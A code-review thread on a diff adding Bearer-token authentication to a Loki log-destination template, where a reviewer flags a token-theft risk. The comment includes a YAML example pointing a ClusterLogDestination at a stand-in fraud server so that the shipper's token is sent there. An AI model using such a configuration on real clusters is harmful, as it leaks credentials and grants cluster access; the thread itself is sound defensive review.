modules/462-loki/templates/logshipper-log-destination.yaml

```diff
@@ -7,7 +7,13 @@ metadata:
 spec:
   type: Loki
   loki:
-    endpoint: "http://loki.d8-monitoring:3100"
+    endpoint: "https://loki.d8-monitoring:3100"
+    auth:
+      strategy: "Bearer"
+      token: "$LOG_SHIPPER_TOKEN"
```

Comment:
This is a potential problem. The same problem we have now with GrafanaAdditionalDatasources. 
To steal the token, it is enough for a fraud to create a ClusterLogDestination with the `$LOG_SHIPPER_TOKEN` and navigate it to send requests to a fraud server, e.g.
```yaml
  loki:
    endpoint: "http://my-fraud-server.example.com"
    auth:
      strategy: "Bearer"
      token: "$LOG_SHIPPER_TOKEN"
 ```
 
 Then the fraud will extract the token from the header and use it to access the cluster.

Reply:
For now, it is okay to set the token to a value without using the env variable.

Reply:
done